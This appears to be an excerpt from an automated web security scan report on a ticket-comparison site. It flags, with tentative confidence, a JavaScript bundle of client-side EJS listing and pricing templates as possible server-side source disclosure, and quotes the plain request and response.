<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel_inner.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
</div>
...[SNIP]...
<div class="providerNotes">\n\
<%= notes %>\n\
</div>
...[SNIP]...
<tbody>\n\
<% var eTickets = false, eTicket, i; %>\n\
<% for (i = 0; i < deals.length; i++) { %>\n\
<%\n\
if (eTicketsUI && deals[i].delivery && deals[i].delivery[0] == \'do_et\') {\n\
eTicket = true;\n\
eTickets = true;\n\
} else {\n\
eTicket = false;\n\
}\n\
%>\n\
<tr class="providerRow <%= (i != deals.length - 1) ? \'notlast\' : \'\'%>">
...[SNIP]...
<td class="providerName<%= eTicket ? \' e-ticket\' : \'\' %>"><%= deals[i].broker %></td>
...[SNIP]...
<td class="salePrice<%= FS.config.view.props.highlightBasePrice ? \' boldPrice\' : \'\' %>"><%= float_to_currency(deals[i].salePrice, 2) %></td>
...[SNIP]...
<td class="handlingFee"><%= float_to_currency(deals[i].handlingFee, 2) %></td>
...[SNIP]...
<td class="totalPrice<%= FS.config.view.props.highlightBasePrice ? \'\' : \' boldPrice\' %>"><%= float_to_currency(deals[i].salePrice + deals[i].handlingFee, 2) %></td>
...[SNIP]...
<div class="blueButton_small" data-ticketSetId="<%= deals[i].id %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=<%= i + 1 %>;dt=<%= totalDeals %>;lpos=<%= listPosition %>" data-dealPosition="<%= i %>"><%= goButtonText %></div>
...[SNIP]...
<div class="additionalNotes">\n\
<% if (eTickets) { %>\n\
<div><%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket" } ) %> eTicket</div>
...[SNIP]...
<div class="providerFeesNote"><%= detailPanelNote %></div>
...[SNIP]...
</span>\n\
<% if (sharingEnabled) { %>\n\
<span class ="panelLink shareLink">
...[SNIP]...
<% } %>\n\
<% if (shortListEnabled) { %>\n\
<% if (saved) {\n\
var text = \'Saved\';\n\
var savedCss = " savedOffer";\n\
} else {\n\
var text = \'Save\';\n\
var savedCss = "";\n\
} %>\n\
<span class ="panelLink saveLink<%= savedCss %>"><a href="javascript:void(0)"><%= text %></a>
...[SNIP]...
<div class="seatprice" data-ticketSetId="<%= ticketId %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=0;dt=<%= totalDeals %>;lpos=<%= listPosition %>">\n\
<div class="<%= TicketListFormattingHelpers.choosePriceClass(price) %>">
...[SNIP]...
<span class="price"><%= TicketListFormattingHelpers.addCommas(price) %></span>
...[SNIP]...
<div class="select-btn-<%= goButtonClass %> new-go-button"><%= goButtonText %></div>\n\
<% if (FS.config.view.props.highlightBasePrice) { %>\n\
<div class="total-with-fee">$<%= TicketListFormattingHelpers.addCommas(Math.ceil(totalPrice)) %> with<br/> <%= broker.length > 13 ? \'seller\' : broker %> fees</div>
...[SNIP]...
<div id="<%= listPosition %><%= domIdModifier %>-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText, \'hoverAction\': true})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.props.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="tixLogo">\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-compact-\'+brokerId+\'.gif\'), \'broker logo\') %>\n\
</div>
...[SNIP]...
<div class="best-value-<%= bvTag %>">
...[SNIP]...
<strong>\n\
<% if ((typeof row_style === \'undefined\') || row_style == \'both\') { %>\n\
<span class="ticket-section"><%= section %></span>
...[SNIP]...
<span>Row <%= row %></span>\n\
<% } else if (row_style == \'row_only\') { %>\n\
<span class="row-only-view" >Row: <%= row %></span>
...[SNIP]...
<span class="series-date"><%= dateTime %></span>\n\
<div class="handling">\n\
<%= splitsText %>\n\
<% if (eTicketsUI && hasETicket) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket", "title": "eTicket" } ) %>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'row_only\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'none\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %> <%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section! \n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to(" ", \'/reviews_photos_intro\', {target: \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="seat-view-link-rt">\n\
<%= link_to(\'Zoom into map\',"javascript:void(0)", {\'class\': \'zoom-to-map\'}) %>\n\
</div>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %> <%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section! \n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to(" ", \'/reviews_photos_intro\', {\'target\': \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>
...[SNIP]...

16.4. http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundle2.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cdn-1.fansnap.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundle2.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundle2.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-1.fansnap.com

Response

HTTP/1.0 200 OK
x-amz-id-2: sCxnSXOpIiy9OMgiSoYn97LNE4CdZItv9U8so2HvjPasv6zpgNRSAvN0GZnD5RTX
x-amz-request-id: 31879A0D96CFC8F5
Date: Tue, 12 Jul 2011 18:05:10 GMT
x-amz-meta-group: 0
x-amz-meta-owner: 0
x-amz-meta-permissions: 33204
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:39:51 GMT
Last-Modified: Tue, 12 Jul 2011 06:42:23 GMT
ETag: "57246edac8c7716a48ae3dbba6033e35"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 172002
Server: AmazonS3
Age: 606837
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 059383fcc05c34e33da8b899d4706f605c0d5f29a2b78f6d13149e25dca25323838c78f047e1cbe8
Via: 1.0 2815dd16e8c2a0074b81a6148bd8aa3a.cloudfront.net:11180 (CloudFront), 1.0 a02a758285c6952d9ec10f895b84b63a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function($){var topics={};$.fn.publish=function(topic,args,sync){if(typeof topics[topic]=="undefined"){return this;}
var args=args||[],argsLength=args.length,t=topics[topic],l=t.length,that=this,publ
...[SNIP]...
each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name]);});};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id;};_.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};_.template=function(str,data){var c=_.templateSettings;var tmpl='var __p=[],print=function(){__p.push.apply(__p,arguments);};'+'with(obj||{}){__p.push(\''+
str.replace(/\\/g,'\\\\').replace(/'/g,"\
...[SNIP]...
ame:userName,userXid:user.get("userXid"),venueName:venueName};var name=eventName;if(opts.nameTemplate){name=this._renderTemplate(opts.nameTemplate,context);}
var captionTemplate=opts.captionTemplate||"<%= eventDate %> in <%= eventCity %>.";var caption=this._renderTemplate(captionTemplate,context);var hash=opts.hash;if(opts.hashTemplate){hash=this._renderTemplate(opts.hashTemplate,context);}
var params={method:'feed',name:name,caption:
...[SNIP]...
entifyingData:function(){var idString=this.uid+'|'+this.style+'|'+this.channel+'|'+this.ctx;return idString;}};if(typeof preCompiledEJSTemplates=='undefined'){var preCompiledEJSTemplates={};}
var str='<% var broker_ids = [];\n\
for(broker_id in brokers) {\n\
broker_ids[brokers[broker_id][\'sort_order\']] = broker_id;\n\
};\n\
%>\n\
<div id="broker_filter" class="in-map-filter-holder">
...[SNIP]...
<h2>Providers (<%= num_brokers %>)</h2>
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < broker_ids.length; i++) { %>\n\
<li class="in-map-filter-<%= logos_enabled ? "bg" : "no" %>-img">
...[SNIP]...
<div class="in-map-filter-labels">\n\
<% if(logos_enabled) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-\'+ broker_ids[i] +\'.gif\'), broker_id +\'_id\') %>\n\
<% } %>
...[SNIP]...
<label for="<%= broker_ids[i] %>_id">\n\
<%= brokers[broker_ids[i]]["name"] %> (<strong><%= brokers[broker_ids[i]]["seat_count"] %></strong>)\n\
<% if (channel.forceParam) {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details?ch=\' + channel.code;\n\
}\n\
else {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details\';\n\
}\n\
%>\n\
[<a href=\'<%= link %>\' onclick=\'broker_popup(this.href); return false;\'>
...[SNIP]...
<input type="checkbox" class="flt_brk" name="brks[]" id="<%= broker_ids[i] %>_id" value="<%= broker_ids[i] %>" <%= brokers[broker_ids[i]][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>
...[SNIP]...
<div id="locationList">\n\
<%= lookupEjsTemplate(\'seats_page/location_filter_inner.ejs\').render({\'facets\': facets, \'outer_class_name\': "flt_area", \'outer_input_name\': \'areas[]\', \'child_class_name\': \'flt_sec\', \'child_input_name\': \'secs[]\'})%>\n\
<div class="in-map-select">
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < facets.length; i++) { %>\n\
<li class="static-list-ele">
...[SNIP]...
<input type="checkbox" id="areas[]-<%= facets[i].id%>" name="areas[]" value="<%= facets[i].id%>" class="<%= outer_class_name %>" <%=facets[i][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>\n\
<label class="static-list-label"><%= facets[i].name %></label>\n\
<% if (facets[i].children) { %>\n\
<span class=\'expandable\'>
...[SNIP]...
<ul class="mSecList" >\n\
<% for(var j=0; j < facets[i].children.length; j++) { %>\n\
<li class="mSecListItems">
...[SNIP]...
<input type="checkbox" class="<%= child_class_name %>" name="secs[]" value="<%= facets[i].children[j].id %>" <%=facets[i].children[j][\'start_checked\'] ? \' checked="checked"\' : \'\' %> />
...[SNIP]...
<label> <%= facets[i].children[j].name %> </label>
...[SNIP]...
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel_inner.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
</div>
...[SNIP]...
<div class="providerNotes">\n\
<%= notes %>\n\
</div>
...[SNIP]...
<tbody>\n\
<% var eTickets = false, eTicket, i; %>\n\
<% for (i = 0; i < deals.length; i++) { %>\n\
<%\n\
if (eTicketsUI && deals[i].delivery && deals[i].delivery[0] == \'do_et\') {\n\
eTicket = true;\n\
eTickets = true;\n\
} else {\n\
eTicket = false;\n\
}\n\
%>\n\
<tr class="providerRow <%= (i != deals.length - 1) ? \'notlast\' : \'\'%>">
...[SNIP]...
<td class="providerName<%= eTicket ? \' e-ticket\' : \'\' %>"><%= deals[i].broker %></td>
...[SNIP]...
<td class="salePrice<%= FS.config.view.props.highlightBasePrice ? \' boldPrice\' : \'\' %>"><%= float_to_currency(deals[i].salePrice, 2) %></td>
...[SNIP]...
<td class="handlingFee"><%= float_to_currency(deals[i].handlingFee, 2) %></td>
...[SNIP]...
<td class="totalPrice<%= FS.config.view.props.highlightBasePrice ? \'\' : \' boldPrice\' %>"><%= float_to_currency(deals[i].salePrice + deals[i].handlingFee, 2) %></td>
...[SNIP]...
<div class="blueButton_small" data-ticketSetId="<%= deals[i].id %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=<%= i + 1 %>;dt=<%= totalDeals %>;lpos=<%= listPosition %>" data-dealPosition="<%= i %>"><%= goButtonText %></div>
...[SNIP]...
<div class="additionalNotes">\n\
<% if (eTickets) { %>\n\
<div><%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket" } ) %> eTicket</div>
...[SNIP]...
<div class="providerFeesNote"><%= detailPanelNote %></div>
...[SNIP]...
</span>\n\
<% if (sharingEnabled) { %>\n\
<span class ="panelLink shareLink">
...[SNIP]...
<% } %>\n\
<% if (shortListEnabled) { %>\n\
<% if (saved) {\n\
var text = \'Saved\';\n\
var savedCss = " savedOffer";\n\
} else {\n\
var text = \'Save\';\n\
var savedCss = "";\n\
} %>\n\
<span class ="panelLink saveLink<%= savedCss %>"><a href="javascript:void(0)"><%= text %></a>
...[SNIP]...
<div class="seatprice" data-ticketSetId="<%= ticketId %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=0;dt=<%= totalDeals %>;lpos=<%= listPosition %>">\n\
<div class="<%= TicketListFormattingHelpers.choosePriceClass(price) %>">
...[SNIP]...
<span class="price"><%= TicketListFormattingHelpers.addCommas(price) %></span>
...[SNIP]...
<div class="select-btn-<%= goButtonClass %> new-go-button"><%= goButtonText %></div>\n\
<% if (FS.config.view.props.highlightBasePrice) { %>\n\
<div class="total-with-fee">$<%= TicketListFormattingHelpers.addCommas(Math.ceil(totalPrice)) %> with<br/> <%= broker.length > 13 ? \'seller\' : broker %> fees</div>
...[SNIP]...
<div id="<%= listPosition %><%= domIdModifier %>-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.props.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'comparableKey\': comparableKey, \'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': saved})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
</span><%= link_to("Share on Facebook",\'javascript:InlineUtil.ticketSetFBShare("\' + shareId + \'&sec=\' + section + \'&row=\' + row + \'&prc=\' + price + \'", this);\') %></li>
...[SNIP]...
</span><%= link_to("Post on Twitter", twitterUrl +\'&tss_=\' + shareId + \'&sec=\' + section + \'&row=\' + row + \'&prc=\' + price, {\'target\': "_blank", \'onclick\': "window.open(this.href,\'sharing_win\',\'height=540,width=763,scrollbars=yes,resizable=no,toolbar=false,location=false\'); return false;"}) %></li>
...[SNIP]...
</span><%= link_to("Email to a friend", emailUrl +\'&tss_=\' + shareId + \'&sec=\' + section + \'&row=\' + row + \'&prc=\' + price, {\'target\': "_blank", \'onclick\': "window.open(this.href,\'sharing_win\',\'height=540,width=490,scrollbars=yes,resizable=no,toolbar=false,location=false\'); return false;"}) %></li>
...[SNIP]...
<div class="tixLogo">\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-compact-\'+brokerId+\'.gif\'), \'broker logo\') %>\n\
</div>
...[SNIP]...
<div class="best-value-<%= bvTag %>">
...[SNIP]...
<strong>\n\
<% if ((typeof row_style === \'undefined\') || row_style == \'both\') { %>\n\
<span class="ticket-section"><%= section %></span>
...[SNIP]...
<span>Row <%= row %></span>\n\
<% } else if (row_style == \'row_only\') { %>\n\
<span class="row-only-view" >Row: <%= row %></span>
...[SNIP]...
<span class="series-date"><%= dateTime %></span>\n\
<div class="handling">\n\
<%= splitsText %>\n\
<% if (eTicketsUI && hasETicket) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket", "title": "eTicket" } ) %>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-ticket-listing" class="new-seat-row" onmouseover="SeatsPageController.highlightSet(\'<%= ticketId %>\',true);" onmouseout="SeatsPageController.highlightSet(\'<%= ticketId %>\',false);">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox.ejs\').render({\'ticketId\': ticketId, \'listPosition\': \'NA\', \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= SeatsPageController.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': true})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
